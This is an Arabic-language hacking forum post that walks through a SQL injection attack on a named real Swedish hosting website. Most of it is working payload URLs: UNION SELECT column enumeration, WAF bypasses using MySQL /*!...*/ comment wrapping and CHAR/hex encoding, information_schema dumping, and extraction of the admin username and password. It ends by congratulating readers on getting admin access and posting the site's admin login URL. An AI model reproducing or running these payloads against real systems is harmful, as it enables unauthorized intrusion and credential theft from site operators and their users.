Admin
عدد المساهمات : 341
تاريخ التسجيل : 13/05/2011
العمل/الترفيه : مصور
 المزاج : Don't Play With Me
 |  موضوع: حل مشكله not acceptable عند الحقن  الخميس سبتمبر 08, 2011 10:44 pm | |
| ....... اليوم وقعت على موقع مصاب ب SQL و لكنت عندما حاولت الاستغلال واجهتنى مشكله ذهبت الى احد الاصدقاء لانى فتره و انا توقفت عن الحقن يمكن اكثر من سنه المهم ها الشخص و هو معنا فى المنتدى قالى شغل مخك هههههههههههه المهم و اليكم ما فعلت لان اكيد راح تستفيدون من هذا ================================================== ========= اولا انا وجدت الثغره هنا كود PHP: http://www.crystallnet.se/hosting/index.php?id=1484 طبعا اول شىء وضعت العلامه المفضضله لكشف اى خطا بالقاعده و هى (') و اصبح الموقع كود PHP: http://www.crystallnet.se/hosting/index.php?id=1484' طيب الحين ظهر ان الموقع مصاب قررت الاستغلال طبعا بدائت اضيف و اجرب حتى اتمكن من ايجاد العمود المصاب المهم اول شىء اضفت هذا حل كود PHP: order+by+100 الاخر كود PHP: order by 100 الاثنين يفعلون نفس الامر المهم انا اظل انقص برقم (100) حتى تعود الصفحه كما كانت و هنا يكون المكان المطلوب المهم حتى ما اطول صار معى عند كود PHP: http://www.crystallnet.se/hosting/index.php?id=1484+ORDER+BY+52 و بدائت الاستغلال كود PHP: http://www.crystallnet.se/hosting/index.php?id=-1484%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52-- و كانت النتيجه مثل ما شفتم "Not Acceptable" المهم وش تعتقدون ممكن اسوى جربت كل شىء اولا جربت اغير بين 1,2,3,4 و ما شبك اولا فكرت فى كود PHP: UNION (SELECT 1,2,3,4,5......) ثانيا فكرت فى كود PHP: UNION SELECT 1/**/2/**/3/**/4/**/........ ثالثا فكرت فى كود PHP: UNION SELECT 111/**/222/**/333/**/...... كلهم ما شبكم حتى تذكرت هذا الفلتر الوحش القوى اللى كنت ناسيه كود PHP: /*!......*/ و بداء بوضعها عند ال SELECT و اصبح كالتالى كود PHP: http://www.crystallnet.se/hosting/index.php?id=-1484%20union%20/*!select*/%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52-- و اخيرا بدا يشبك الموقع و طبعا ظهر عندكم العمود المصاب و هو "4" المهم بداءت وضع VERSION() &DATABASE()&USER() و كله تمام واجهتنى مشكله اخرى و هى عند تنفيذ ال كود PHP: CONCAT() و كان بهذا الشكل كود PHP: http://www.crystallnet.se/hosting/index.php?id=-1484%20union%20/*!select*/%201,2,3,group_concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns-- واجهتنى نفس المشكله مره اخرى و هى "Not Acceptable" و طبعا اكيد المشكله دلوقتى عند ال GROUP_CONCAT() طبعا و الحل هو الفلتره ب كود PHP: /*!GROUP_CONCAT(......)*/ و هيبقى الاستغلال كده يا رجاله احلى موقع كود PHP: http://www.crystallnet.se/hosting/index.php?id=-1484 union /*!select*/ 1,2,3,/*!group_concat(table_name,0x3a,column_name,0x3a,table_schema)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns-- طبعا اشتغلت و بقى زى الفل قلت كمل يا واد يا LINUX.BT3 كمل و ربنا هيكرمك بحجات حلوه كفايه انك حاسس انك بتكلم السيرفر لول المهم كملت طيب انا قلت مش ناقص الا انى ادور على ال PASSWD المهم رحت على موقع تشفير يشفر علشان احول %passwd% ل char() او ممكن فى ناس تستخدم ال HackBar ألمهم نكمل و شفرت و اصبح التشفير كود PHP: CHAR(37, 112, 97, 115, 37) طبعا رحت كملت الاستغلال باضافه كود PHP: where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- اصبح الاستغلال كود PHP: http://www.crystallnet.se/hosting/index.php?id=-1484 union /*!select*/ 1,2,3,/*!group_concat(table_name,0x3a,column_name,0x3a,table_schema)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- المهم نفس المشكله تانى و هى "Not Acceptable" المهم طيب شباب احنا فلترنا ال SELECT و مشى الحال وفلترنا ال CONCAT و مشى الحال و زى الفل طيب اخر حاجه اضفناها و هى ال WHERE يبقى نروح نقفشها و نفلتر ابوها كود PHP: http://www.crystallnet.se/hosting/index.php?id=-1484 union /*!select*/ 1,2,3,/*!group_concat(table_name,0x3a,column_name,0x3a,table_schema)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns+/*!where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)*/-- تمام طبعا ظبط معاكم و زى الفل طيب نكمل دلوقتى طلع لنا التاالى cr_users:password:crytse_crystallnet طيب دلوقتى كل شىء تمام عايزين نصطاد ام الادمن يلا بينا نروح نشفر cr_users تشفير MySql hex-encoded string علشان نجيب البهاريز اللى جوه طبعا من اشهر المواقع او اشهرهم لي شخصيا http://www.waraxe.us/sql-char-encoder.htmlالمهم بعد التشفير يصبح كود PHP: 0x63725f7573657273 طيب نكل الاستغلال كود PHP: http://www.crystallnet.se/hosting/index.php?id=-1484 union /*!select*/ 1,2,3,/*!group_concat(table_name,0x3a,column_name,0x3a,table_schema)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns+/*!where+table_name=0x63725f7573657273*/-- طبعا ظهر كل شىء يا حلاوه فل اوى المهم نكمل دلوقتى بقى احنا محتاجين نجمع معلومات عن المكان اللى احنا فيه و هو ال columns بتاعه ال cr_user و تمام زى ما انتم شايفين فى الجزء ده كود PHP: cr_users:username:crytse_crystallnet,cr_users:password: طيب تمام الاستغلال الاخير بقى طبعا كود PHP: http://www.crystallnet.se/hosting/index.php?id=-1484 union /*!select*/ 1,2,3,/*!concat(username,0x3a,password)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+crytse_crystallnet.cr_users-- ومبروك عليكم الادمن شباب ارجو ان اكون افدت الجميع ارجو التقييم اذا كان الموضوع جيد طبعا انا لا اعلم اذا كان الجميع يعلم هذا او لا و لكنى متاكد انى افدت احد ملاحظه هناك فرق كبير بين ال كود PHP: concat() و كود PHP: group_concat() حاولوا تغيرها و ستلاحظون الفرق لوحه دخول الادمن http://www.crystallnet.se/admin/منقول للفائده ........ | |
|
